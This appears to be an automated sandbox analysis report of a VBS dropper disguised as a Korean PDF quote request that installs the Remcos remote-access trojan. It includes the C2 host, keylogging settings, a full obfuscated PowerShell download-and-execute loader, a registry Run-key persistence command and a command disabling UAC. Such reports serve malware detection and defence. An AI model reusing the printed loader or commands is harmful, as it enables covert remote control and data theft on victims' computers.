Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 07:01
Static task
static1
Behavioral task
behavioral1
Sample
견적요청-SNU-RFQ-25-0074_2024-25-11·pdf.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
견적요청-SNU-RFQ-25-0074_2024-25-11·pdf.vbs
Resource
win10v2004-20241007-en
General
-
Target
견적요청-SNU-RFQ-25-0074_2024-25-11·pdf.vbs
-
Size
15KB
-
MD5
4080a1f28d2e8017fefb06ca6d46b608
-
SHA1
add65be2539a98c3ce1c2bd82fb9a63a46b9c050
-
SHA256
1fbf193c059f852718522ab608ebfeaebc3062bc2da2e4450be765f3718b210c
-
SHA512
4647908cbaeca76c30cba24f1bb985f07b5eade617aafbec26bd74bebff5cf52d4a70b9580b2f182173ae98df5b50324a232cdfc1e4fa86141b57736e46bb381
-
SSDEEP
384:RBOrNzhAwnWeEzMF7JDSz5nFheEduNsLXiEwnyB+7rH:2ZzhAjemMF7JDSzhFhV20XMyU7rH
Malware Config
Extracted
remcos
RemoteHost
5nd42h78s.duckdns.org:3782
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-J5NDOL
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Blocklisted process makes network request 64 IoCs
Processes:
WScript.exepowershell.exemsiexec.exeflow pid Process 3 2108 WScript.exe 9 1968 powershell.exe 15 1968 powershell.exe 25 4844 msiexec.exe 27 4844 msiexec.exe 29 4844 msiexec.exe 32 4844 msiexec.exe 33 4844 msiexec.exe 35 4844 msiexec.exe 41 4844 msiexec.exe 47 4844 msiexec.exe 51 4844 msiexec.exe 53 4844 msiexec.exe 54 4844 msiexec.exe 55 4844 msiexec.exe 56 4844 msiexec.exe 57 4844 msiexec.exe 58 4844 msiexec.exe 59 4844 msiexec.exe 60 4844 msiexec.exe 61 4844 msiexec.exe 62 4844 msiexec.exe 63 4844 msiexec.exe 64 4844 msiexec.exe 65 4844 msiexec.exe 66 4844 msiexec.exe 67 4844 msiexec.exe 68 4844 msiexec.exe 69 4844 msiexec.exe 70 4844 msiexec.exe 71 4844 msiexec.exe 72 4844 msiexec.exe 73 4844 msiexec.exe 74 4844 msiexec.exe 75 4844 msiexec.exe 76 4844 msiexec.exe 77 4844 msiexec.exe 80 4844 msiexec.exe 82 4844 msiexec.exe 83 4844 msiexec.exe 84 4844 msiexec.exe 85 4844 msiexec.exe 86 4844 msiexec.exe 87 4844 msiexec.exe 88 4844 msiexec.exe 89 4844 msiexec.exe 90 4844 msiexec.exe 91 4844 msiexec.exe 92 4844 msiexec.exe 93 4844 msiexec.exe 94 4844 msiexec.exe 95 4844 msiexec.exe 96 4844 msiexec.exe 97 4844 msiexec.exe 98 4844 msiexec.exe 99 4844 msiexec.exe 100 4844 msiexec.exe 101 4844 msiexec.exe 104 4844 msiexec.exe 106 4844 msiexec.exe 107 4844 msiexec.exe 109 4844 msiexec.exe 110 4844 msiexec.exe 113 4844 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Isttes70 = "%Poddidge% -windowstyle 1 $Cachaemic=(gp -Path 'HKCU:\\Software\\fllesfunktions\\').Reportagernes;%Poddidge% ($Cachaemic)" reg.exe -
Processes:
powershell.exepowershell.exepid Process 1968 powershell.exe 2028 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Processes:
powershell.exepowershell.exepid Process 2028 powershell.exe 1968 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid Process 4844 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid Process 2028 powershell.exe 4844 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
reg.exepowershell.exemsiexec.execmd.exereg.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid Process 1968 powershell.exe 1968 powershell.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 2028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 2028 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
msiexec.exepid Process 4844 msiexec.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exemsiexec.execmd.execmd.exedescription pid Process procid_target PID 2108 wrote to memory of 1968 2108 WScript.exe 82 PID 2108 wrote to memory of 1968 2108 WScript.exe 82 PID 2028 wrote to memory of 4844 2028 powershell.exe 93 PID 2028 wrote to memory of 4844 2028 powershell.exe 93 PID 2028 wrote to memory of 4844 2028 powershell.exe 93 PID 2028 wrote to memory of 4844 2028 powershell.exe 93 PID 4844 wrote to memory of 4144 4844 msiexec.exe 94 PID 4844 wrote to memory of 4144 4844 msiexec.exe 94 PID 4844 wrote to memory of 4144 4844 msiexec.exe 94 PID 4144 wrote to memory of 4292 4144 cmd.exe 96 PID 4144 wrote to memory of 4292 4144 cmd.exe 96 PID 4144 wrote to memory of 4292 4144 cmd.exe 96 PID 4844 wrote to memory of 1928 4844 msiexec.exe 97 PID 4844 wrote to memory of 1928 4844 msiexec.exe 97 PID 4844 wrote to memory of 1928 4844 msiexec.exe 97 PID 1928 wrote to memory of 3412 1928 cmd.exe 99 PID 1928 wrote to memory of 3412 1928 cmd.exe 99 PID 1928 wrote to memory of 3412 1928 cmd.exe 99
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\견적요청-SNU-RFQ-25-0074_2024-25-11·pdf.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tampers='flappe';;$Sophus189='Bystanders';;$Medalize='Bankfilialer';;$Lnudviklingens160='Statsministres';;$Fonotekernes='Bisonokses';;$fremmedfrerne=$host.Name;function Heksekedelens($Afvaskningens){If ($fremmedfrerne) {$Nonspecious=4} for ($Ambonnay=$Nonspecious;;$Ambonnay+=5){if(!$Afvaskningens[$Ambonnay]) { break }$Zarismes20+=$Afvaskningens[$Ambonnay]}$Zarismes20}function Teutomaniac($Grundvandsbeskyttelser){ .($cyklinger) ($Grundvandsbeskyttelser)}$Hyoglycocholic=Heksekedelens 'N utNBiple P.cTDk.t. utbWAdjuEOoecBAb ncCaeclFo.uIwhipeKalvnTorvt';$Pluskvamperfektummer=Heksekedelens 'InddMembao.ullzRangiEftelSkurlDactagrov/';$Svajryg=Heksekedelens 'LibeTRisalBorgs Co.1 Tv 2';$Unparagraphed='Stru[a soNTov ESkretRoed.CompsS,ene olrArchvFeraI aeCIndoEOffePMis OTettiDa pNS ioT AbdMOc,oaRe rNApolAProgGProteTil.r Cau]Skrf:Skt :U resSkrmEQuadc,arauGerar SchiCapaTLandYSlvgPRemeR RazoParatLodzooathC kndop lyLG or=Lkke$Sedds LymV CodaEminj FreROverYUnc,G';$Pluskvamperfektummer+=Heksekedelens 'C nc5 Udb.fixe0Spil Pall(ProdW etsiSchonfiskdRen o rafwTeorsPlur exxN U iT.ndt U l1Patu0Alfa. Sha0w nn; Das ,ostWDro,iMiljn rsl6Akva4 ,fm;Ophi pegax,van6 Ret4Preh;Aflb Un qrRuflvso g:Miav1Revi3Peas1O lt.Samp0 Sty)Fils Sup G.ngbeMun.cOblik erioTils/Hert2Sml 0De,y1 Amb0 R v0Zara1Soli0Lerd1Char SemiFappli ilbrPalee S rfArkioGrunxKo t/Stav1Vlte3B ir1 Ser. a,a0';$Hjertekardiografsignaler=Heksekedelens 'RustUKeybS Mete TolrTv r-s rfAKa tg atETubuN ertT';$Thionation=Heksekedelens 'EntohBolitDriftSnigp se sPhot: Oms/afsp/Kampd Pr rFlasi UncvFebeeBlge.Fu,ogB,neoPervoByb g fvilChafeOrth.HandcHje oPulvmN za/PalauFermc Sad?,lybeUninxMdeapCypro Mi.rJolltdamm=KirudcatioBeviwAtt nOpialFortobestaSalvdDeho&Femti Me dba,k=Poly1fo lUAlkyS apopSocidnavnI eva8StopR ympM bonw CoabSeksDMolsO PlaxJuli5 a,dgBena6pontCSkisxUnosZ HagsMiraLRetfmSo eu TracSv nqDink_Fl v9 Noto N,kc .as1 andPLnn,W';$Dromometer=Heksekedelens 'Tags>';$cyklinger=Heksekedelens 'Pod iFinaE Corx';$Verdensformats='Stringy';$Hamamelin='\Mundil.Snn';Teutomaniac (Heksekedelens ' Slu$ Frig culLC rao .ahB F cA Locl.edb:StamlBomboBr,nT Al.TEncaeNonar xypiKaryEHornrSans=Casi$ areSmaanUndyVPerd:DiskaE ilpKuldp agD Neda ordtRu mAS nk+ ech$ ImphMariaEssaM Aaba SlamDatae B jLTolviByudn');Teutomaniac (Heksekedelens 'Upsp$ agbgReprl GueO Fejb RkkA icklNiy :Mor.BPlexUSc oR,ncoG ilke iluR ebyED.clS ast= lse$KargtQuadhBaryi resOYel.NCdroAOve.tOvn,iMi tocat NTr.b.SignsMiscPUdmaLTappI OveTF lk(bran$Kvrnd esr BesoCasam SnioTrylM heaEElekt SyzEUd.rRPr i)');Teutomaniac (Heksekedelens $Unparagraphed);$Thionation=$Burgeres[0];$Placative=(Heksekedelens 'Clud$SkrigHa eL WpboPolkBGumlaKravLForg: TuriS otNUnpraLou U.hudsPr dpPar.I arbc gniFr.kOFor.U Ke sBirsnOvere,riesErhvsButy=PresNMeloeRaadw ,il-Omsao dyrb Wi j chiEVi icfor tT ot KrydSUdsmyPl dSst itTreceObermGl s.Cl,a$Pi uHNyheY BudOLesbg acol G.gyTankcFiltoBe,ec dekhFinroStavlLutriShaiC');Teutomaniac ($Placative);Teutomaniac (Heksekedelens '.rle$ oldITrk,n U,iaGardu,ousssatapSe,oi U hcLavei oluoPrivuKulasPe rn HaneEnfes,onnsFinh. E,pHWhifeLa yaBuckdInd eG.llr Kr sCopp[Appa$h,rrH MiljMal,eFor rSoapt TyseCai kSkudaCloardaybdd,reiVe.eo Cynghockr ara ystfFldesPaahiTeksgTigrnArisaOp al Stoe acrShor]Pn e= re $SikkPCro lMakeuIndusSleikTrskvHarpaFilemOktapIcare ponrTabufPhane edlkHa.etUnneust nmSynsmSpdbeSv,nr');$Unpiles=Heksekedelens 'Biog$ConfIRe.inDi.ka r nu.alvsvivapv rki,ylecEmiliKonto HeiuMinasS,ilnQuare,lynsFemesConv. C,iDSandoVil wGramnEmi,lBehoomereaIndsdSensFNatuiRusklOscaeSka ( X,n$ F,eTFlinh Omli AraoHampnDiazaJ lltJumpiXerioCan.nC.yo, ste$ P eGSkareAf,onK ffuVaassS ale OmrsNote)';$Genuses=$Lotterier;Teutomaniac (Heksekedelens 's rv$Ki.dGD,ifLQu kOBaskBU.vaA.ordlSi,u:SlynV SagiChi aunvedTotau LanCCo,ltPods7Spa 7hmor= U o(succTOttaeKnleS dysT Dom-AchrPTurraUdsktAfv H ype ci$acroG SmlePokenCom,UBondS UnveSubasud p)');while (!$Viaduct77) {Teutomaniac (Heksekedelens 'Rhi,$jaymg.ecklMytho Ca.bUnwaaNak lYell: M rCKernaUnsilMyx l Cetidia gAggrrG epaSt spSimuhTow,eEp prA to= Sta$ remDFavoi RouvTempiSidedJagte D srStyreC tys') ;Teutomaniac $Unpiles;Teutomaniac (Heksekedelens 'Ex rsMisdt Ge,AcoxorTag.tReps- onSFundl ProeAnnieEn.eP Uer uan4');Teutomaniac (Heksekedelens 'Skl $Ef,eg emlMarkoSkjtbPultaPhy.LEnkn:delavVa iiDo bALanddJus UKr iC Reft C r7Tari7 dh=Anab(Indtt GeneSkovS UneTCo,s-GoldPKe,yaFor,tH,ndh Vik Penr$GravgSkufECry NEngjuMgfasBl.neG lfs Vas)') ;Teutomaniac (Heksekedelens ' Unb$Unexg rafL.oosOHetzb SpeaHulkLS.or:St spCh liK hrCLa.dC misAs avlNon,i Poilnve,lReguiv lj=Comp$NailgMetal.oraOParaBNo,daBraulaver:Di eFDamkGFr dtP eaeSjleM radA SjiSNoniKop ieBranR Exin eroEPale+Le f+ ici%B,ot$neutb igujonqRPhajGpapeeDereRNaboEForeSUdsp.Elguc RanoSommu TilN ushT') ;$Thionation=$Burgeres[$Piccalilli]}$Ambonnayndtales=302364;$Frough=31066;Teutomaniac (Heksekedelens 'Stup$kursG Rysl xpO ickbDisbAfilkLLdre:railT navA UnpWMesoNHj rINomaNParteL.diSThymsPeni9Chry9 Rnt Stan= ark HamaGTil eEnfoTCo r-VirocBageosin N NottSta ESympNReprt unt Unri$ .ubG one.tudn Ly U Wh s,ndve akts');Teutomaniac (Heksekedelens 'Eksp$Abs,g hialApocoFornbSup aHalvlbill: OttTOveroandrpL.inn hrogHarnltimmeThic Gen=f.lt O er[ForsSscisySitus FortChibe idemTrin.MalaC rivoPramnDdtev BygeGaderWh mtReto]Sca :Degr:SimpF S or U.po P mm KotBAlbaaV idsh.peeUdka6Cirk4R ntS SpitMe orJuleiQuean logKron(Brom$ slaTSundaSlubwcoenn SynitrisnUnwee T hsBulls Fol9Hymn9Coop)');Teutomaniac (Heksekedelens 'Sawl$BleagSkrilFiacoGlambUnjaAHmsklSt t:TeledPataeStngC befR AnsYTetr Ba.n=e do Watc[,isdsMargYSulpS FrstRid EBombM Lu . gi TClaveAra.XNearT Knu. DareSpa N racArc,oCatsDSelaiCoinN ,ydGSynd] F,r: tap: SkuAan,oSVenncPennI TaxI Sam.F lsGFlidecoriTN,nfsIag T,lurr.dioi amenRemoGbesv( A.o$ A.dtVel OChasp SkanHimmgCistlElboePlo )');Teutomaniac (Heksekedelens 'Uun,$PictgJumpLdd iOH wbBMamaAT,anlMono: lndtSprnoResunBelts,emeiBrndlEv,lI ExiTFlabi clecZone= Bla$S.brDF.emE.salcNon r Ns YAut,.TilmSBe luSu rBhelbsC seTSkatr pegiAgernlanigSicl( A t$ D.iAE erM Ornb,odoOKurcNT ibnamazaTr fy Brun PerDMaletIn eAPhosLRke.E St sE il,Q.ad$FejlFeu oR Quio afbUDiagGUdfyh Hnn)');Teutomaniac $tonsilitic;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tampers='flappe';;$Sophus189='Bystanders';;$Medalize='Bankfilialer';;$Lnudviklingens160='Statsministres';;$Fonotekernes='Bisonokses';;$fremmedfrerne=$host.Name;function Heksekedelens($Afvaskningens){If ($fremmedfrerne) {$Nonspecious=4} for ($Ambonnay=$Nonspecious;;$Ambonnay+=5){if(!$Afvaskningens[$Ambonnay]) { break }$Zarismes20+=$Afvaskningens[$Ambonnay]}$Zarismes20}function Teutomaniac($Grundvandsbeskyttelser){ .($cyklinger) ($Grundvandsbeskyttelser)}$Hyoglycocholic=Heksekedelens 'N utNBiple P.cTDk.t. utbWAdjuEOoecBAb ncCaeclFo.uIwhipeKalvnTorvt';$Pluskvamperfektummer=Heksekedelens 'InddMembao.ullzRangiEftelSkurlDactagrov/';$Svajryg=Heksekedelens 'LibeTRisalBorgs Co.1 Tv 2';$Unparagraphed='Stru[a soNTov ESkretRoed.CompsS,ene olrArchvFeraI aeCIndoEOffePMis OTettiDa pNS ioT AbdMOc,oaRe rNApolAProgGProteTil.r Cau]Skrf:Skt :U resSkrmEQuadc,arauGerar SchiCapaTLandYSlvgPRemeR RazoParatLodzooathC kndop lyLG or=Lkke$Sedds LymV CodaEminj FreROverYUnc,G';$Pluskvamperfektummer+=Heksekedelens 'C nc5 Udb.fixe0Spil Pall(ProdW etsiSchonfiskdRen o rafwTeorsPlur exxN U iT.ndt U l1Patu0Alfa. Sha0w nn; Das ,ostWDro,iMiljn rsl6Akva4 ,fm;Ophi pegax,van6 Ret4Preh;Aflb Un qrRuflvso g:Miav1Revi3Peas1O lt.Samp0 Sty)Fils Sup G.ngbeMun.cOblik erioTils/Hert2Sml 0De,y1 Amb0 R v0Zara1Soli0Lerd1Char SemiFappli ilbrPalee S rfArkioGrunxKo t/Stav1Vlte3B ir1 Ser. a,a0';$Hjertekardiografsignaler=Heksekedelens 'RustUKeybS Mete TolrTv r-s rfAKa tg atETubuN ertT';$Thionation=Heksekedelens 'EntohBolitDriftSnigp se sPhot: Oms/afsp/Kampd Pr rFlasi UncvFebeeBlge.Fu,ogB,neoPervoByb g fvilChafeOrth.HandcHje oPulvmN za/PalauFermc Sad?,lybeUninxMdeapCypro Mi.rJolltdamm=KirudcatioBeviwAtt nOpialFortobestaSalvdDeho&Femti Me dba,k=Poly1fo lUAlkyS apopSocidnavnI eva8StopR ympM bonw CoabSeksDMolsO PlaxJuli5 a,dgBena6pontCSkisxUnosZ HagsMiraLRetfmSo eu TracSv nqDink_Fl v9 Noto N,kc .as1 andPLnn,W';$Dromometer=Heksekedelens 'Tags>';$cyklinger=Heksekedelens 'Pod iFinaE Corx';$Verdensformats='Stringy';$Hamamelin='\Mundil.Snn';Teutomaniac (Heksekedelens ' Slu$ Frig culLC rao .ahB F cA Locl.edb:StamlBomboBr,nT Al.TEncaeNonar xypiKaryEHornrSans=Casi$ areSmaanUndyVPerd:DiskaE ilpKuldp agD Neda ordtRu mAS nk+ ech$ ImphMariaEssaM Aaba SlamDatae B jLTolviByudn');Teutomaniac (Heksekedelens 'Upsp$ agbgReprl GueO Fejb RkkA icklNiy :Mor.BPlexUSc oR,ncoG ilke iluR ebyED.clS ast= lse$KargtQuadhBaryi resOYel.NCdroAOve.tOvn,iMi tocat NTr.b.SignsMiscPUdmaLTappI OveTF lk(bran$Kvrnd esr BesoCasam SnioTrylM heaEElekt SyzEUd.rRPr i)');Teutomaniac (Heksekedelens $Unparagraphed);$Thionation=$Burgeres[0];$Placative=(Heksekedelens 'Clud$SkrigHa eL WpboPolkBGumlaKravLForg: TuriS otNUnpraLou U.hudsPr dpPar.I arbc gniFr.kOFor.U Ke sBirsnOvere,riesErhvsButy=PresNMeloeRaadw ,il-Omsao dyrb Wi j chiEVi icfor tT ot KrydSUdsmyPl dSst itTreceObermGl s.Cl,a$Pi uHNyheY BudOLesbg acol G.gyTankcFiltoBe,ec dekhFinroStavlLutriShaiC');Teutomaniac ($Placative);Teutomaniac (Heksekedelens '.rle$ oldITrk,n U,iaGardu,ousssatapSe,oi U hcLavei oluoPrivuKulasPe rn HaneEnfes,onnsFinh. E,pHWhifeLa yaBuckdInd eG.llr Kr sCopp[Appa$h,rrH MiljMal,eFor rSoapt TyseCai kSkudaCloardaybdd,reiVe.eo Cynghockr ara ystfFldesPaahiTeksgTigrnArisaOp al Stoe acrShor]Pn e= re $SikkPCro lMakeuIndusSleikTrskvHarpaFilemOktapIcare ponrTabufPhane edlkHa.etUnneust nmSynsmSpdbeSv,nr');$Unpiles=Heksekedelens 'Biog$ConfIRe.inDi.ka r nu.alvsvivapv rki,ylecEmiliKonto HeiuMinasS,ilnQuare,lynsFemesConv. C,iDSandoVil wGramnEmi,lBehoomereaIndsdSensFNatuiRusklOscaeSka ( X,n$ F,eTFlinh Omli AraoHampnDiazaJ lltJumpiXerioCan.nC.yo, ste$ P eGSkareAf,onK ffuVaassS ale OmrsNote)';$Genuses=$Lotterier;Teutomaniac (Heksekedelens 's rv$Ki.dGD,ifLQu kOBaskBU.vaA.ordlSi,u:SlynV SagiChi aunvedTotau LanCCo,ltPods7Spa 7hmor= U o(succTOttaeKnleS dysT Dom-AchrPTurraUdsktAfv H ype ci$acroG SmlePokenCom,UBondS UnveSubasud p)');while (!$Viaduct77) {Teutomaniac (Heksekedelens 'Rhi,$jaymg.ecklMytho Ca.bUnwaaNak lYell: M rCKernaUnsilMyx l Cetidia gAggrrG epaSt spSimuhTow,eEp prA to= Sta$ remDFavoi RouvTempiSidedJagte D srStyreC tys') ;Teutomaniac $Unpiles;Teutomaniac (Heksekedelens 'Ex rsMisdt Ge,AcoxorTag.tReps- onSFundl ProeAnnieEn.eP Uer uan4');Teutomaniac (Heksekedelens 'Skl $Ef,eg emlMarkoSkjtbPultaPhy.LEnkn:delavVa iiDo bALanddJus UKr iC Reft C r7Tari7 dh=Anab(Indtt GeneSkovS UneTCo,s-GoldPKe,yaFor,tH,ndh Vik Penr$GravgSkufECry NEngjuMgfasBl.neG lfs Vas)') ;Teutomaniac (Heksekedelens ' Unb$Unexg rafL.oosOHetzb SpeaHulkLS.or:St spCh liK hrCLa.dC misAs avlNon,i Poilnve,lReguiv lj=Comp$NailgMetal.oraOParaBNo,daBraulaver:Di eFDamkGFr dtP eaeSjleM radA SjiSNoniKop ieBranR Exin eroEPale+Le f+ ici%B,ot$neutb igujonqRPhajGpapeeDereRNaboEForeSUdsp.Elguc RanoSommu TilN ushT') ;$Thionation=$Burgeres[$Piccalilli]}$Ambonnayndtales=302364;$Frough=31066;Teutomaniac (Heksekedelens 'Stup$kursG Rysl xpO ickbDisbAfilkLLdre:railT navA UnpWMesoNHj rINomaNParteL.diSThymsPeni9Chry9 Rnt Stan= ark HamaGTil eEnfoTCo r-VirocBageosin N NottSta ESympNReprt unt Unri$ .ubG one.tudn Ly U Wh s,ndve akts');Teutomaniac (Heksekedelens 'Eksp$Abs,g hialApocoFornbSup aHalvlbill: OttTOveroandrpL.inn hrogHarnltimmeThic Gen=f.lt O er[ForsSscisySitus FortChibe idemTrin.MalaC rivoPramnDdtev BygeGaderWh mtReto]Sca :Degr:SimpF S or U.po P mm KotBAlbaaV idsh.peeUdka6Cirk4R ntS SpitMe orJuleiQuean logKron(Brom$ slaTSundaSlubwcoenn SynitrisnUnwee T hsBulls Fol9Hymn9Coop)');Teutomaniac (Heksekedelens 'Sawl$BleagSkrilFiacoGlambUnjaAHmsklSt t:TeledPataeStngC befR AnsYTetr Ba.n=e do Watc[,isdsMargYSulpS FrstRid EBombM Lu . gi TClaveAra.XNearT Knu. DareSpa N racArc,oCatsDSelaiCoinN ,ydGSynd] F,r: tap: SkuAan,oSVenncPennI TaxI Sam.F lsGFlidecoriTN,nfsIag T,lurr.dioi amenRemoGbesv( A.o$ A.dtVel OChasp SkanHimmgCistlElboePlo )');Teutomaniac (Heksekedelens 'Uun,$PictgJumpLdd iOH wbBMamaAT,anlMono: lndtSprnoResunBelts,emeiBrndlEv,lI ExiTFlabi clecZone= Bla$S.brDF.emE.salcNon r Ns YAut,.TilmSBe luSu rBhelbsC seTSkatr pegiAgernlanigSicl( A t$ D.iAE erM Ornb,odoOKurcNT ibnamazaTr fy Brun PerDMaletIn eAPhosLRke.E St sE il,Q.ad$FejlFeu oR Quio afbUDiagGUdfyh Hnn)');Teutomaniac $tonsilitic;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Isttes70" /t REG_EXPAND_SZ /d "%Poddidge% -windowstyle 1 $Cachaemic=(gp -Path 'HKCU:\Software\fllesfunktions\').Reportagernes;%Poddidge% ($Cachaemic)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Isttes70" /t REG_EXPAND_SZ /d "%Poddidge% -windowstyle 1 $Cachaemic=(gp -Path 'HKCU:\Software\fllesfunktions\').Reportagernes;%Poddidge% ($Cachaemic)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3412
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD58394c4e2455e7c6b5e21b4282118eb01
SHA1a063afbfd632eac488fc2a342433640f77908008
SHA256407e1bc787b7c7ca6319ab65d1608d7dc6edda013de7b93e48392d83f2d05e5a
SHA512af375e1cc50f43c5eb98c11370c5f09a675f39c5547915b9069919d48b7fddcabbe5e2bd6b8e1171019b027cf934695bfad673cb9d76e48f1c02af9d6f2f8bf2
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
434KB
MD57babfa1cfd73160aea1c973277be8974
SHA139f3d08cc1c21be1ca0bd6c29e9dccbc8509a275
SHA2560b1bdccf05ad3242eaaf63f1eb4ecf517608251b915b6cbd6ad893426cdb0d39
SHA512059f894a53baf7516569432d100ceae31182b531a35ae461a960c71333ea08383beedce1cbddecae6ad3af513c3099ad3649cb473a8e1915a9db175a61125c85